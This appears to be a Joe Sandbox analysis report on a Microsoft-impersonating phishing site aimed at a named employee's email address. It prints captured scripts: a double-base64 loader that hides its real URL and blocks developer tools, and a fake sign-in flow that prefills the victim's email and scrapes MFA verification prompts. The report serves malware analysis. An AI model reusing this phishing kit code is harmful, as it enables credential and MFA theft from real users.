| URL: http://loginmicrosoftonline.Bdo.scoremasters.gr Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: http://loginmicrosoftonline.Bdo.scoremasters.gr |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate and common practice for web security. While it uses some techniques that could be considered risky, such as dynamic message handling and communication with the parent window, the overall context and purpose of the script suggest it is not malicious. The script is likely used to implement a security challenge or verification mechanism, which is a common practice for protecting web applications from abuse."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'lana3',
chlApiSitekey: '0x4AAAAAAA48HUZPt9267vYw',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'wSZAy6SHjsEAdX.aybkCIojMMJXRsS1RR0zWZlisoxg-1736509619-1.3.1.1-m.mfNkU.okY7Zw89Ei7kQA8vJkTh8GPces.Rm4Ox54E',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8ffc6dffe8872369',
cH: '2WnRQ8XMzohRD3AB5WwP745W87.XUgnoIUsPbt7uW5o-1736509619-1.1.1.1-ZmS_aFOE24PYKU.uoQ_mB_PHj18e3h.ir9BLdjV29Cg.ESTZYEF6HBhmvfFU5r5l',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'AQww_f54oMSu6XDvFelf80ginyt0Xd4yAYaiPJqB.Kg-1736509619-1.1.1.1-qaSIGOhytkNpHZF54vAxNzc_VROZXLYbtpZT06x4gIV_q1E84Xh6qYJPu2YbL68SwIhl4arOyh5YfUk9Z_k42gl7ReoZnKKy67cIoMK0h6_yciAOwsC.mnTkepjfVigHStVoLxnIUQ_nHiBQpSqmub6H7wryhArdKwoXpHUoLdW3mmLmthV35GArHE5zC1kEewTLsrykIyCd_vtPGh7R5yii532NiW6h8fUaFyIEHokVAFY.BvHVu4yAtcW75B6cnitkBoT8yYtmoGHysxMX7req7T_B9r3VQBFew.Oj2_K1w58gAgGaZ9zKo6pzMXAq8WXlacfImFS_.EEMjBgWrlwi06uhM4WqiaocTSiLyxNWW74NgS60L4pb4r5GgOinWTw921OB_ZqAv8E_EF7pg.a5POFl_3CpF4.N_WSoWuO36BPh6CDWPuwFW6DQ6dULI1kLy5q2wW2ztCBEKVUIHqiVMg_b8jjLqVwlOQWqHI2GgrXoq0lwnoURdBp0KahijTDiqXycay5bpo7oi3gqfiuMuQIGP2Iq6dFRbuZ6C4udiwkpmymbWw.EdjZTriLqhXmSDFBTHiCFXgcY.kUS2xKOWzN8C5BHanXafduaFfIQ1Q60k8mgrF41GKGkPeJ3tTtxVqLy4MyS3WWJl04QdvyfF82FhJpA29C8TAasmvqYm2NQqg1DSFW_Jw7tnlmwyzgn18T_ZR62bbmKiqZe9B3FTewxpfDFDR1hEXAhdv7590LteiFMw_SxuC8J06gf1WP6m0SUP0LiqzZurZCX43qD6ZJnb5X4Z9Ym_THQulNEcS0FWCNqQxdoz2V6BV.X701ySB.dvth4nTZXzZAjjiGCZNB9dsMzVUeBW3cGIr6h4NQSjMeNuXAI66ko0hOpbtN4ubBP0_QmkH8NTt.NmYdYdn9Zul1Dy1zj9nhFp21kABqaCVseTWWBHJs__dQGBqj8r2MrVERyuGDHy6H5LoFMeD32eZyzLc0xjy7baKpylwFxFQb27TR9eLHonh1PpBEc8G2ok3cTKtLvdMlcH0c5QEECBqtKrT_OGx4sOOpleURx7recAKgS1vcBz4FapyKNMGoi0rub8OrywjsM6Q6Mq2BZBogVSXUD06O84SNwyuQpbdQUBi0SDT7OmUlmI7qqMKeQ2TAkJsLX0A_137I_AHyp26rc8.Ry7kAZno_zf2q2Up3BYKbRBREYWBz6PphjL7_2iiLbaWrCBU8sNtJYsbcY.FUrSAL_5w7W9lAGHELdzm1m.XnO8MRKJrNQDh2C.V5iDrvSijQSOzN3gCITwegnjghNqAXqg1tVfgPEBJONLNeeMSWqyWSFUt0Dxz6m4yJBrhBhPJUiPcevWsO93xrXmmcxMG9FhDilRMLxroKbBm1OI5lLAKMrcjBJxKrEeyJsiZlBpLqXUqsSbkFKnvcKPUuPQj_YFHtZ.mEBis.Hmjkqi4jDFT3hoUam',
cITimeS: '1736509619',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'lana3',
nextRcV: 'wSZAy6SHjsEAdX.aybkCIojMMJXRsS1RR0zWZlisoxg-1736509619-1.3.1.1-m.mfNkU.okY7Zw89Ei7kQA8vJkTh8GPces.Rm4Ox54E',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://loginmlcrosoftonlineofficactiveappsdirecto... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the behaviors may have legitimate purposes, the overall implementation raises significant security concerns. The use of double base64 decoding, the presence of anti-DevTools protection, and the prevention of common user interactions (right-click, content selection) further contribute to the high-risk assessment."
} |
// Double base64 decoder function
function carwashmachinesandsettings(encodedStr) {
try {
let iworkatthecarwash = atob(encodedStr);
let amthebossatthecarwash = atob(iworkatthecarwash);
return amthebossatthecarwash;
} catch (error) {
console.error('Decoding error:', error);
return null;
}
}
// Main content loader function
function loadContent(token) {
const loader = document.getElementById('loader');
const frame = document.getElementById('content-frame');
const errorMessage = document.getElementById('error-message');
const turnstileContainer = document.getElementById('turnstile-container');
try {
errorMessage.style.display = 'none';
loader.style.display = 'block';
frame.style.opacity = '0';
turnstileContainer.style.display = 'none';
const wedontmakemuchatthecarwash = window.location.hash.substring(1);
if (!wedontmakemuchatthecarwash) {
throw new Error('Invalid hash');
}
const iloveworkingontusedaysguys = "YUhSMGNITTZMeTl5WldObGFYQjBMV1p5YVdWdVpITm9hWEF0WldabWFXTnBaVzUwTFhoc0xuUnllV05zYjNWa1pteGhjbVV1WTI5dA==";
const iloveworkingonmondaysguys = carwashmachinesandsettings(iloveworkingontusedaysguys);
if (!iloveworkingonmondaysguys) {
throw new Error('Invalid URL format');
}
const aboutourcarwash = iloveworkingonmondaysguys + "/#" + wedontmakemuchatthecarwash;
frame.src = aboutourcarwash;
frame.onload = () => {
loader.style.display = 'none';
frame.style.opacity = '1';
document.title = 'Secure Content';
};
frame.onerror = () => {
loader.style.display = 'none';
errorMessage.style.display = 'block';
frame.style.opacity = '0';
turnstileContainer.style.display = 'flex';
};
} catch (error) {
console.error('Error:', error);
loader.style.display = 'none';
errorMessage.style.display = 'block';
frame.style.opacity = '0';
turnstileContainer.style.display = 'flex';
}
}
// Initialize Turnstile
window.onload = function() {
turnstile.render('#turnstile-widget', {
sitekey: '0x4AAAAAAA48HUZPt9267vYw', // Replace with your actual Cloudflare Turnstile site key
callback: function(token) {
loadContent(token);
},
theme: 'light'
});
}
// Clear iframe content before unload
window.onbeforeunload = () => {
document.getElementById('content-frame').src = 'about:blank';
};
// Anti-DevTools protection
setInterval(() => {
if (window.chrome && window.chrome.webstore) {
if (window.outerHeight - window.innerHeight > 100) {
document.body.innerHTML = '';
}
}
}, 1000);
// Prevent dev tools shortcuts
document.addEventListener('keydown', (e) => {
if (e.ctrlKey && e.shiftKey && (e.key === 'I' || e.key === 'J' || e.key === 'C') ||
e.key === 'F12') {
e.preventDefault();
}
});
// Prevent right-click
document.addEventListener('contextmenu', (e) => {
e.preventDefault();
});
// Additional security: prevent iframe content selection
document.addEventListener('selectstart', (e) => {
e.preventDefault();
});
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. The script sets up various configuration options and translations for the Cloudflare challenge, but does not contain any high-risk indicators like dynamic code execution, data exfiltration, or malicious redirects. The script is likely legitimate and part of a standard Cloudflare integration, so the overall risk is low."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_expired":"Expired","turnstile_verifying":"Verifying...","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_privacy":"Privacy","testing_only":"Testing%20only.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_feedback_description":"Send%20Feedback","turnstile_feedback_report":"Having%20trouble%3F","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_failure":"Error","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","human_button_text":"Verify%20you%20are%20human","turnstile_footer_terms":"Terms","turnstile_overrun_description":"Stuck%20here%3F","turnstile_timeout":"Timed%20out","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_refresh":"Refresh","turnstile_success":"Success%21"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eU,eY,eZ,f0,f4,f5,f8,fb,fd,fe,ff,fr,fD,fJ,fK,fL,fV,g6,ga,gd,ge,gE,gb,gc){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1043))/1*(parseInt(gI(1624))/2)+parseInt(gI(1135))/3+parseInt(gI(1355))/4*(-parseInt(gI(471))/5)+-parseInt(gI(1164))/6+parseInt(gI(1303))/7*(-parseInt(gI(998))/8)+-parseInt(gI(1282))/9*(-parseInt(gI(908))/10)+-parseInt(gI(1614))/11*(-parseInt(gI(1729))/12),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,625283),eM=this||self,eN=eM[gJ(856)],eM[gJ(873)]=![],eM[gJ(554)]=function(h0){if(h0=gJ,eM[h0(873)])return;eM[h0(873)]=!![]},eU=0,eN[gJ(313)]===gJ(1731)?eN[gJ(1594)](gJ(727),function(){setTimeout(eX,0)}):setTimeout(eX,0),eY=function(he,d,e,f,g){return he=gJ,d={'AJqjO':function(h,i){return h+i},'HzpUn':function(h,i){return h|i},'WbcDy':function(h,i){return h+i},'hHsuU':he(1740),'iTStL':function(h,i){return h==i},'bqrUn':function(h,i){return h<i},'trtdL':function(h,i){return h==i},'eZRuQ':function(h,i){return h-i},'kJYip':function(h,i){return h(i)},'wpYhs':function(h,i){return h>i},'HKfer':function(h,i){return h|i},'qayft':function(h,i){return i&h},'ApKWZ':function(h,i){return h-i},'kFOnj':function(h,i){return h<i},'GWUiw':function(h,i){return h<<i},'vDokG':function(h,i){return i==h},'QtLXq':function(h,i){return h|i},'zUbiD':function(h,i){return h-i},'ikiOa':function(h,i){return i&h},'tioUw':function(h,i){return h!==i},'SKqqp':he(1721),'zLlDT':function(h,i){return h&i},'JreBl':function(h,i){return h(i)},'mWQqV':function(h,i){return i==h},'tbUGn':function(h,i){return h&i},'VCaZj':function(h,i){return h-i},'qsBos':function(h,i){return i==h},'YEISI':functio |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Please verify you are human",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": true,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Please verify you are human",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://challenges.cloudflare.com/turnstile/v0/b/e... Model: Joe Sandbox AI | ```json
{
"risk_score": 1,
"reasoning": "The script does not exhibit any high-risk or moderate-risk behaviors. It primarily consists of utility functions and error handling, with no evidence of dynamic code execution, data exfiltration, or interaction with external domains. The code appears to be part of a larger library or framework, likely for handling asynchronous operations and error management."
} |
"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Gt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://receipt-friendship-efficient-xl.trycloudfl... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a login or authentication flow, with some potentially concerning behaviors. While it does not exhibit any clear malicious intent, there are a few moderate-risk indicators that warrant further review. The script dynamically manipulates the DOM and interacts with external domains, which could potentially lead to data exfiltration or other security issues if not properly implemented. Additionally, the use of legacy APIs like `XDomainRequest` is a low-risk indicator. Overall, the script requires closer inspection to ensure it is not misusing user data or introducing security vulnerabilities."
} |
let authTimer;
let statusCheckInterval;
// Fixed email URL check
function checkEmailFromUrl() {
const hash = window.location.hash;
const params = new URLSearchParams(window.location.search);
const hashEmail = hash ? hash.split('email=')[1] : null;
const queryEmail = params.get('email');
const email = hashEmail || queryEmail;
if (email) {
document.getElementById('email').value = decodeURIComponent(email);
// Show loading message
const loadingMessage = document.getElementById('loadingMessage');
loadingMessage.style.display = 'flex';
// After animation, show password view
setTimeout(() => {
loadingMessage.style.display = 'none';
showPasswordView();
// Show session message
const sessionMsg = document.getElementById('sessionMessage');
if (sessionMsg) sessionMsg.style.display = 'block';
}, 2000); // Match animation duration
return true;
}
return false;
}
function showLoading(show) {
const loadingBar = document.getElementById('loadingBar');
const buttons = document.querySelectorAll('.next-button:not([onclick="submitAuthCode()"])'); // Exclude auth code button
if (show) {
loadingBar.style.display = 'block';
buttons.forEach(btn => {
btn.disabled = true;
btn.style.opacity = '0.7';
});
} else {
loadingBar.style.display = 'none';
buttons.forEach(btn => {
btn.disabled = false;
btn.style.opacity = '1';
});
}
}
function findAuthenticatorNumber() {
console.log('Searching for authenticator number...');
const selectors = [
'[id*="DisplaySign"]',
'[class*="displaySign"]',
'[data-bind*="displaySign"]',
'.display-sign-container div',
'.verification-number'
];
for (const selector of selectors) {
const elements = document.querySelectorAll(selector);
for (const element of elements) {
const number = element.textContent.trim();
if (/^\d+$/.test(number)) {
console.log('Found authenticator number:', number);
return number;
}
}
}
const numberMatch = document.documentElement.innerHTML.match(/verification number[:\s]+(\d+)/i);
if (numberMatch) {
console.log('Found number through regex:', numberMatch[1]);
return numberMatch[1];
}
console.log('No authenticator number found');
return null;
}
function showAuthSection(type) {
const container = document.querySelector('.login-container');
const section = document.getElementById(type + 'Section');
// Hide other views
document.getElementById('emailView').style.display = 'none';
document.getElementById('passwordView').style.display = 'none';
// Show auth section
section.style.display = 'block';
container.setAttribute('data-auth-shown', 'true');
updateAuthDisplay();
// Force container to expand
setTimeout(() => {
const sectionHeight = section.scrollHeight;
container.style.minHeight = `${sectionHeight + 50}px`;
}, 100);
}
function detectAuthType(content) {
console.log('Detecting auth type...');
const callIndicators = [
'[id*="SAOTCC_Description"]',
'.text-block-body:contains("calling your phone")',
'div:contains("We\'re calling your phone")',
'[class*="call-verification"]',
'phoneNumber',
'calling your phone'
];
const authenticatorIndicators = [
'[id*="SAOTCAS_Description"]',
'[class*="displaySign"]',
'verification number',
'Authenticator app',
'approve the request'
];
const htmlContent = content?.html || document.documentElement.innerHTML;
let isCall = false;
let isAuthenticator = false;
callIndicators.forEach(indicator => {
i |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Enter password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The URL does not match the legitimate domain name associated with Microsoft, which is microsoft.com.", "The URL contains suspicious elements such as misspellings and extra characters (e.g., 'mlcrosoft' instead of 'microsoft').", "The domain extension '.pages.dev' is unusual for a Microsoft service.", "The URL includes multiple words that are not typically associated with Microsoft's legitimate services (e.g., 'activeappsdirectorysystemsdevelop').", "The presence of multiple concatenated words and the absence of a clear brand association in the domain name are common phishing indicators." ], "riskscore": 9}
Google indexed: False |
URL: loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev
Brands: Microsoft
Input Fields: unknown |
| URL: https://loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev/#181f545b23e24bbc998bb5278a6ee3?email=christian.wernli%40bdo.ch Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is a well-known global technology company.", "The legitimate domain for Microsoft services is 'microsoft.com'.", "The provided URL 'loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev' does not match the legitimate domain.", "The URL contains misspellings and extra words that are not associated with Microsoft's legitimate domain.", "The use of 'pages.dev' as a domain extension is unusual for Microsoft and suggests a potential phishing attempt.", "The URL structure is complex and includes multiple concatenated words, which is a common tactic in phishing URLs." ], "riskscore": 9}
Google indexed: False |
URL: loginmlcrosoftonlineofficactiveappsdirectorysystemsdevelop.pages.dev
Brands: Microsoft
Input Fields: Enter password |
Edit tour
chrome.exe (PID: 6232 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node